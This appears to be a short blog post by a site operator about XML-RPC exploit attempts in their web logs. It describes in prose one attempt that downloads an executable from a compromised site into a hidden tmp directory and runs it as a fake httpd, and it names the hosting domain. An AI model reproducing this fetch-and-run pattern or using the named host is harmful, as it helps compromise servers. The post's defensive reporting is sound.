This past week I've talked about XML-RPC a bit in relation to this blog and the software that it runs. Although I have always seen a decent amount of XML-RPC exploit attempts in the web logs, they seem to be on the rise lately.
It might be just a fluke but it makes me wonder overall. One of the more interesting ones tries to make a "..." directory in your global tmp directory, grab a file from an exploited/rooted website, set it to be executable, then launch it as a pseudo-httpd.
I'm working on trying to contact the people running "http://xinad.dog-on-line.com" to get the exploit code taken off their site. I won't mention the full URL because it would be easy to grab this static linked executable and setup more compromised websites with it. You might want to block traffic from there in the meantime.
All in all, it just increases my love for mod_security.
For the curious, this is what 'file' has to say about the file the exploit tries to download:
"skript-kiddies-r-us: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, corrupted section header size"
I'll probably run it thru gdb on a VM to see what it does, or take the easy way and see what strace shows in a VM that is isolated from any network.
